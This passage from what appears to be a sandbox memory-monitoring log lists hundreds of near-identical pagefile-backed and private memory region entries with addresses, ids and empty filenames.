12333 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12334 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12335 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12336 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12337 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12338 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12339 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12340 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12341 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12342 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12343 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12344 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12345 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12346 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12347 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12348 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12349 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12350 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12351 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12352 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12353 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12354 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12355 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12356 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12357 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12358 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12359 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12360 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12361 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12362 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12363 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12364 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12365 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12366 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12367 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12368 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12369 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12370 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12371 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12372 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12373 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12374 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12375 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12376 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12377 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12378 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12379 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12380 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12381 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12382 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12383 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12384 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12385 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12386 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12387 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12388 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12389 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12390 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12391 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12392 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12393 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12394 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12395 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12396 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12397 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12398 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12399 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12400 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12401 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12402 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12403 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12404 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12405 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12406 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12407 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12408 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12409 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12410 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12411 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12412 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12413 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12414 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12415 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12416 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12417 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12418 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12419 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12420 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12421 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12422 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12423 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12424 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12425 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12426 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12427 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12428 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12429 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12430 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12431 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12432 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12433 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12434 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12435 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12436 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12437 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12438 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12439 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12440 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12441 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12442 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12443 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12444 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12445 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12446 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12447 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12448 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12449 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12450 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12451 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 12452 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12453 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12454 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 12455 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12456 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12457 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12458 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12459 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12460 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12461 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12462 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12463 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12464 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12465 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12466 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12467 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12468 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12469 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12470 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12471 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12472 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12473 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12474 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12475 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12476 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12477 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12478 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12479 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12480 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12481 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12482 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12483 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12484 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12485 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12486 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12487 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12488 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12489 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12490 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12491 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12492 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12493 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12494 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12495 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12496 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12497 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12498 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12499 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12500 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12501 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12502 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12503 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12504 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12505 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12506 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12507 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12508 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12509 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 12510 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 12511 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12512 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12513 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12514 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12515 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12516 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12517 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12518 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12519 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12520 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 12521 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 